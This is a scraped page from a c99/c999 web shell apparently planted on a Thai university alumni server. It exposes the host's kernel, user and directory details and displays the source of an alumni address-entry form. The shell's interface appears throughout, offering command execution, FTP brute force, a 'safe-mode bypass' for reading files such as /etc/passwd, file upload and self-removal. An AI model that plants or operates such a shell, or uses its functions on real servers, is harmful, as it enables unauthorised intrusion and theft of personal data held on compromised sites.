!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis/application/views/ealumni/   drwxr-xr-x
Free 51 GB of 127.8 GB (39.9%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     v_infoAm_2.php (19.74 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<SCRIPT language=JavaScript type="text/JavaScript">
function copyAddr(chk) {
    var homeAddr = document.getElementById("homeAddress").value;
    var dtNameHome = document.getElementById("dtNameHome").value;
    var dtIdHome = document.getElementById("dtIdHome").value;
    var apNameHome = document.getElementById("apNameHome").value;
    var apIdHome = document.getElementById("apIdHome").value;
    var prvNameHome = document.getElementById("prvNameHome").value;
    var prvIdHome = document.getElementById("prvIdHome").value;
    var zipcodeHome = document.getElementById("homeZipcode").value;
    var phoneHome = document.getElementById("homePhoneNo").value;
    var cur_cntChk = document.getElementById('cur_cntChk');
    var work_cntChk = document.getElementById('work_cntChk');

    if(chk.name=="curChk" && cur_cntChk.checked==true) {
        if(document.myform.curChk.checked==true) {
            document.getElementById("currentAddress").value = homeAddr;
            document.getElementById("dtNameCur").value = dtNameHome;
            document.getElementById("dtIdCur").value = dtIdHome;
            document.getElementById("apNameCur").value = apNameHome;
            document.getElementById("apIdCur").value = apIdHome;
            document.getElementById("prvNameCur").value = prvNameHome;
            document.getElementById("prvIdCur").value = prvIdHome;
            document.getElementById("currentZipcode").value = zipcodeHome;
            document.getElementById("currentPhoneNo").value = phoneHome;
        } else {
            document.getElementById("currentAddress").value = "";
            document.getElementById("dtNameCur").value = "";
            document.getElementById("dtIdCur").value = "";
            document.getElementById("apNameCur").value = "";
            document.getElementById("apIdCur").value = "";
            document.getElementById("prvNameCur").value = "";
            document.getElementById("prvIdCur").value = "";
            document.getElementById("currentZipcode").value = "";
            document.getElementById("currentPhoneNo").value = "";
        }
    }

    if(chk.name=="workChk" && work_cntChk.checked==true) {
        if(document.myform.workChk.checked==true) {
            document.getElementById("officeAddress").value = homeAddr;
            document.getElementById("dtNameWork").value = dtNameHome;
            document.getElementById("dtIdWork").value = dtIdHome;
            document.getElementById("apNameWork").value = apNameHome;
            document.getElementById("apIdWork").value = apIdHome;
            document.getElementById("prvNameWork").value = prvNameHome;
            document.getElementById("prvIdWork").value = prvIdHome;
            document.getElementById("officeZipcode").value = zipcodeHome;
            document.getElementById("officePhoneNo").value = phoneHome;
        } else {
            document.getElementById("officeAddress").value = "";
            document.getElementById("dtNameWork").value = "";
            document.getElementById("dtIdWork").value = "";
            document.getElementById("apNameWork").value = "";
            document.getElementById("apIdWork").value = "";
            document.getElementById("prvNameWork").value = "";
            document.getElementById("prvIdWork").value = "";
            document.getElementById("officeZipcode").value = "";
            document.getElementById("officePhoneNo").value = "";
        }
    }
}

// ที่อยู่ปัจจุบัน
function check_curCnt(id) {
    var cur_cntChk = id.value;

    if(cur_cntChk=='I') {
        document.getElementById("exCntAddr").disabled = true;
        document.getElementById("currentCntId").disabled = true;

        document.getElementById("currentAddress").disabled = false;
        document.getElementById("dtNameCur").disabled = false;
        document.getElementById("dtIdCur").disabled = false;
        document.getElementById("apNameCur").disabled = false;
        document.getElementById("apIdCur").disabled = false;
        document.getElementById("prvNameCur").disabled = false;
        document.getElementById("prvIdCur").disabled = false;
        document.getElementById("currentZipcode").disabled = false;
        document.getElementById("currentPhoneNo").disabled = false;
    } else if(cur_cntChk=='E') {
        document.getElementById("exCntAddr").disabled = false;
        document.getElementById("currentCntId").disabled = false;

        document.getElementById("currentAddress").disabled = true;
        document.getElementById("dtNameCur").disabled = true;
        document.getElementById("dtIdCur").disabled = true;
        document.getElementById("apNameCur").disabled = true;
        document.getElementById("apIdCur").disabled = true;
        document.getElementById("prvNameCur").disabled = true;
        document.getElementById("prvIdCur").disabled = true;
        document.getElementById("currentZipcode").disabled = true;
        document.getElementById("currentPhoneNo").disabled = true;
    }
}

// ที่อยู่ที่ทำงาน
function check_workCnt(id) {
    var work_cntChk = id.value;

    if(work_cntChk=='I') {
        document.getElementById("ex_workCntAddr").disabled = true;
        document.getElementById("workCntId").disabled = true;

        document.getElementById("officeAddress").disabled = false;
        document.getElementById("dtNameWork").disabled = false;
        document.getElementById("dtIdWork").disabled = false;
        document.getElementById("apNameWork").disabled = false;
        document.getElementById("apIdWork").disabled = false;
        document.getElementById("prvNameWork").disabled = false;
        document.getElementById("prvIdWork").disabled = false;
        document.getElementById("officeZipcode").disabled = false;
        document.getElementById("officePhoneNo").disabled = false;
    } else if(work_cntChk=='E') {
        document.getElementById("ex_workCntAddr").disabled = false;
        document.getElementById("workCntId").disabled = false;

        document.getElementById("officeAddress").disabled = true;
        document.getElementById("dtNameWork").disabled = true;
        document.getElementById("dtIdWork").disabled = true;
        document.getElementById("apNameWork").disabled = true;
        document.getElementById("apIdWork").disabled = true;
        document.getElementById("prvNameWork").disabled = true;
        document.getElementById("prvIdWork").disabled = true;
        document.getElementById("officeZipcode").disabled = true;
        document.getElementById("officePhoneNo").disabled = true;
    }
}
</SCRIPT>
<?php
$row_am 
= (isset($qu_am) && $qu_am!=NULL) ? $qu_am->row() : NULL;
$row_homeAddr = (isset($qu_homeAddr) && $qu_homeAddr!=NULL) ? $qu_homeAddr->row() : NULL;
$row_curAddr = (isset($qu_curAddr) && $qu_curAddr!=NULL) ? $qu_curAddr->row() : NULL;
$row_workAddr = (isset($qu_workAddr) && $qu_workAddr!=NULL) ? $qu_workAddr->row() : NULL;

if(!
is_null($row_curAddr)) {
    
$internal_cur = ($row_curAddr->currentCntId==0) ? '' 'disabled';
    
$external_cur = ($row_curAddr->currentCntId==0) ? 'disabled' ''
}

if(!
is_null($row_workAddr)) {
    
$internal_work = ($row_workAddr->workCntId==0) ? '' 'disabled';
    
$external_work = ($row_workAddr->workCntId==0) ? 'disabled' '';
}
?>
<table class="szone">
<?php echo form_open($this->config->item("ea_folder")."info_alumni/process_infoAm_2", array("name" => "myform""id" => "myform"));?>
    <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
        <td height="25px" class="indent" colspan="4"><span class="h error">ข้อมูลที่อยู่</span></td>
    </tr>
    <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
        <td class="coltd_szone" colspan="4"><span class="error">ที่อยู่ศิษย์เก่า (ตามภูมิลำเนา)</span></td>
    </tr>
    <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
        <td class="coltd_szone"><b>ที่อยู่</b></td>
        <td>
<?php
        $homeAddr_de 
= array('name' => 'homeAddress','id' => 'homeAddress''value' => set_value('homeAddress'setValue('homeAddress',$row_homeAddr)), 'rows' => '1''cols' => '30');
        echo 
form_textarea($homeAddr_de);
?>
        </td>
        <td class="coltd_szone"><b>ตำบล</b></td>
        <td><input type="text" name="dtNameHome" id="dtNameHome" value="<?php echo set_value('dtNameHome'setValue('dtNameHome',$row_homeAddr));?>" readonly class="input2" />
        <input type="hidden" name="dtIdHome" id="dtIdHome" value="<?php echo set_value('dtIdHome',setValue('dtIdHome',$row_homeAddr));?>" readonly />
<?php
        
echo anchor_popup($this->config->item("ea_folder")."popup/homeAddr_search""<img src=\"".base_url().$this->config->item('ea_search')."\" width=\"15\" height=\"19\" align=\"absmiddle\" border=\"0\" />", array("width" => "550""height" => "350"));
?>
        </td>
    </tr>
    <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
        <td class="coltd_szone"><b>อำเภอ</b></td>
        <td><input type="text" name="apNameHome" id="apNameHome" value="<?php echo set_value('apNameHome',setValue('apNameHome',$row_homeAddr));?>" class="input2" readonly />
        <input type="hidden" name="apIdHome" id="apIdHome" value="<?php echo set_value('apIdHome'setValue('apIdHome',$row_homeAddr));?>" readonly /></td>
        <td class="coltd_szone"><b>จังหวัด</b></td>
        <td><input type="text" name="prvNameHome" id="prvNameHome" value="<?php echo set_value('prvNameHome'setValue('prvNameHome',$row_homeAddr));?>" class="input2" readonly />
        <input type="hidden" name="prvIdHome" id="prvIdHome" value="<?php echo set_value('prvIdHome'setValue('prvIdHome',$row_homeAddr));?>" readonly /></td>
    </tr>
    <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
        <td class="coltd_szone"><b>รหัสไปรษณีย์</b></td>
        <td><input type="text" name="homeZipcode" id="homeZipcode" value="<?php echo set_value('homeZipcode'setValue('homeZipcode',$row_homeAddr));?>" size="6" maxlength="5" class="required-int" />
        <span class="error"><?php echo form_error('homeZipcode');?></span></td>
        <td class="coltd_szone"><b>โทรศัพท์</b></td>
        <td><input type="text" name="homePhoneNo" id="homePhoneNo" value="<?php echo set_value('homePhoneNo'setValue('homePhoneNo',$row_homeAddr));?>" size="11" maxlength="10" class="required-int" />
        <span class="error"><?php echo form_error('homePhoneNo');?></span></td>
    </tr>


    <!-- ############################## จบที่อยู่ตามภูมิลำเนา ############################# -->


    <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
        <td class="coltd_szone" colspan="4"><br /></td>
    </tr>
    <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
        <td class="coltd_szone" colspan="4"><span class="error">ที่อยู่ศิษย์เก่า (ปัจจุบัน)</span>
        <input type="checkbox" name="curChk" id="curChk" value="1" onClick="copyAddr(this)" /> ใช้ที่อยู่ศิษย์เก่า (ตามภูมิลำเนา)</td>
    </tr>
    <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
        <td class="coltd_szone" colspan="4">
        <input type="radio" name="cur_cntChk" id="cur_cntChk" value="I" onClick="check_curCnt(this)" <?php echo ($row_curAddr->currentCntId==0) ? 'checked' '';?> /> ภายในประเทศ</td>
    </tr>
    <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
        <td class="coltd_szone_indent"><b>ที่อยู่</b></td>
        <td>
<?php
        
if($row_curAddr->currentCntId==0)
            
$curAddr set_value('currentAddress'setValue('currentAddress',$row_curAddr));
        else
            
$curAddr '';
?>
        <textarea name="currentAddress" id="currentAddress" rows="1" cols="30" <?php echo $internal_cur;?>><?php echo $curAddr;?></textarea></td>
        <td class="coltd_szone"><b>ตำบล</b></td>
        <td><input type="text" name="dtNameCur" id="dtNameCur" value="<?php echo set_value('dtNameCur'setValue('dtNameCur'$row_curAddr));?>" readonly class="input2" <?php echo $internal_cur;?> />
        <input type="hidden" name="dtIdCur" id="dtIdCur" value="<?php echo set_value('dtIdCur'setValue('dtIdCur',$row_curAddr));?>" readonly <?php echo $internal_cur;?> />
<?php
        
echo anchor_popup($this->config->item("ea_folder")."popup/curAddr""<img src=\"".base_url().$this->config->item('ea_search')."\" width=\"15\" height=\"19\" align=\"absmiddle\" border=\"0\" />", array("width" => "550""height" => "350"));
?>
        </td>
    </tr>
    <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
        <td class="coltd_szone_indent"><b>อำเภอ</b></td>
        <td><input type="text" name="apNameCur" id="apNameCur" value="<?php echo set_value('apNameCur'setValue('apNameCur',$row_curAddr));?>" class="input2" readonly <?php echo $internal_cur;?> />
        <input type="hidden" name="apIdCur" id="apIdCur" value="<?php echo set_value('apIdCur'setValue('apIdCur'$row_curAddr));?>" readonly <?php echo $internal_cur;?> /></td>
        <td class="coltd_szone"><b>จังหวัด</b></td>
        <td><input type="text" name="prvNameCur" id="prvNameCur" value="<?php echo set_value('prvNameCur'setValue('prvNameCur'$row_curAddr));?>" class="input2" readonly <?php echo $internal_cur;?> />
        <input type="hidden" name="prvIdCur" id="prvIdCur" value="<?php echo set_value('prvIdCur'setValue('prvIdCur',$row_curAddr));?>" readonly <?php echo $internal_cur;?> /></td>
    </tr>
    <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
        <td class="coltd_szone_indent"><b>รหัสไปรษณีย์</b></td>
        <td><input type="text" name="currentZipcode" id="currentZipcode" value="<?php echo set_value('currentZipcode'setValue('currentZipcode',$row_curAddr));?>" size="6" maxlength="5" class="required-int" <?php echo $internal_cur;?> />
        <span class="error"><?php echo form_error('currentZipcode');?></span></td>
        <td class="coltd_szone"><b>โทรศัพท์</b></td>
        <td><input type="text" name="currentPhoneNo" id="currentPhoneNo" value="<?php echo set_value('currentPhoneNo'setValue('currentPhoneNo',$row_curAddr));?>" size="11" maxlength="10" class="required-int" <?php echo $internal_cur;?> />
        <span class="error"><?php echo form_error('currentPhoneNo');?></span></td>
    </tr>
    <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
        <td class="coltd_szone" colspan="4">
        <input type="radio" name="cur_cntChk" id="cur_cntChk" value="E" onClick="check_curCnt(this)" <?php echo ($row_curAddr->currentCntId==0) ? "" "checked";?> /> ต่างประเทศ</td>
    </tr>
    <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
        <td class="coltd_szone_indent"><b>ที่อยู่</b></td>
        <td>
<?php
        
if($row_curAddr->currentCntId==0)
            
$ex_curAddr '';
        else
            
$ex_curAddr set_value('currentAddress'setValue('currentAddress',$row_curAddr));
?>
        <textarea name="exCntAddr" id="exCntAddr" rows="1" cols="30" <?php echo $external_cur;?>><?php echo $ex_curAddr;?></textarea></td>
        <td class="coltd_szone">ประเทศ</td>
        <td>
<?php
        $exCnt 
'id="currentCntId"'.$external_cur;
        echo 
form_dropdown('currentCntId'$rs_cntset_value('currentCntId',setValue('currentCntId'$row_curAddr)), $exCnt); 
?>
        </td>
    </tr>


    <!-- ############################## จบที่อยู่ปัจจุบัน ############################# -->


    <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
        <td class="coltd_szone" colspan="4"><br /></td>
    </tr>
    <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
        <td class="coltd_szone" colspan="4"><span class="error">ที่อยู่ที่ทำงานของศิษย์เก่า</span>
        <input type="checkbox" name="workChk" id="workChk" value="1" onClick="copyAddr(this)" /> ใช้ที่อยู่ศิษย์เก่า (ตามภูมิลำเนา)</td>
    </tr>
    <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
        <td class="coltd_szone" colspan="4">
        <input type="radio" name="work_cntChk" id="work_cntChk" value="I" checked onClick="check_workCnt(this)"  <?php echo ($row_workAddr->workCntId==0) ? 'checked' '';?> /> ภายในประเทศ</td>
    </tr>
    <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
        <td class="coltd_szone_indent"><b>ที่อยู่</b></td>
        <td>
<?php
        
if($row_workAddr->workCntId==0)
            
$workAddr set_value('officeAddress'setValue('officeAddress',$row_workAddr));
        else
            
$workAddr '';
?>
        <textarea name="officeAddress" id="officeAddress" rows="1" cols="30" <?php echo $internal_work;?>><?php echo $workAddr;?></textarea></td>
        <td class="coltd_szone"><b>ตำบล</b></td>
        <td><input type="text" name="dtNameWork" id="dtNameWork" value="<?php echo set_value('dtNameWork'setValue('dtNameWork',$row_workAddr));?>" readonly class="input2" <?php echo $internal_work;?> />
        <input type="hidden" name="dtIdWork" id="dtIdWork" value="<?php echo set_value('dtIdWork'setValue('dtIdWork',$row_workAddr));?>" readonly <?php echo $internal_work;?> />
<?php
        
echo anchor_popup($this->config->item("ea_folder")."popup/workAddr""<img src=\"".base_url().$this->config->item('ea_search')."\" width=\"15\" height=\"19\" align=\"absmiddle\" border=\"0\" />", array("width" => "550""height" => "350"));
?>
        </td>
    </tr>
    <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
        <td class="coltd_szone_indent"><b>อำเภอ</b></td>
        <td><input type="text" name="apNameWork" id="apNameWork" value="<?php echo set_value('apNameWork'setValue('apNameWork',$row_workAddr));?>" class="input2" readonly <?php echo $internal_work;?> />
        <input type="hidden" name="apIdWork" id="apIdWork" value="<?php echo set_value('apIdWork'setValue('apIdWork',$row_workAddr));?>" readonly <?php echo $internal_work;?> /></td>
        <td class="coltd_szone"><b>จังหวัด</b></td>
        <td><input type="text" name="prvNameWork" id="prvNameWork" value="<?php echo set_value('prvNameWork'setValue('prvNameWork',$row_workAddr));?>" class="input2" readonly <?php echo $internal_work;?> />
        <input type="hidden" name="prvIdWork" id="prvIdWork" value="<?php echo set_value('prvIdWork'setValue('prvIdWork',$row_workAddr));?>" readonly <?php echo $internal_work;?> /></td>
    </tr>
    <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
        <td class="coltd_szone_indent"><b>รหัสไปรษณีย์</b></td>
        <td><input type="text" name="officeZipcode" id="officeZipcode" value="<?php echo set_value('officeZipcode'setValue('officeZipcode',$row_workAddr));?>" size="6" maxlength="5" class="required-int" <?php echo $internal_work;?> />
        <span class="error"><?php echo form_error('officeZipcode');?></span></td>
        <td class="coltd_szone"><b>โทรศัพท์</b></td>
        <td><input type="text" name="officePhoneNo" id="officePhoneNo" value="<?php echo set_value('officePhoneNo'setValue('officePhoneNo',$row_workAddr));?>" size="11" maxlength="10" class="required-int" <?php echo $internal_work;?> />
        <span class="error"><?php echo form_error('officePhoneNo');?></span></td>
    </tr>
    <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
        <td class="coltd_szone" colspan="4">
        <input type="radio" name="work_cntChk" id="work_cntChk" value="E" onClick="check_workCnt(this)"  <?php echo ($row_workAddr->workCntId==0) ? '' 'checked';?> /> ต่างประเทศ</td>
    </tr>
    <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
        <td class="coltd_szone_indent"><b>ที่อยู่</b></td>
        <td>
<?php
        
if($row_workAddr->workCntId==0)
            
$workAddr '';
        else
            
$workAddr set_value('officeAddress'setValue('officeAddress',$row_workAddr));
?>
        <textarea name="ex_workCntAddr" id="ex_workCntAddr" rows="1" cols="30" <?php echo $external_work;?>><?php echo $workAddr;?></textarea></td>
        <td class="coltd_szone">ประเทศ</td>
        <td>
<?php
        $ex_workCnt 
'id="workCntId"'.$external_work;
        echo 
form_dropdown('workCntId'$rs_cntset_value('workCntId',setValue('workCntId'$row_workAddr)), $ex_workCnt); 
?>
        </td>
    </tr>
    <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
        <td colspan="4" align="center">
        <input type="submit" name="add" id="add" value="บันทึก" />
        <input type="hidden" name="alumniId" id="alumniId" value="<?php echo setValue('alumniId',$row_am);?>" />
        <input type="hidden" name="tab" id="tab" value="<?php echo $tab;?>" /></td>
    </tr>
<?php echo form_close();?></table>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.011 ]--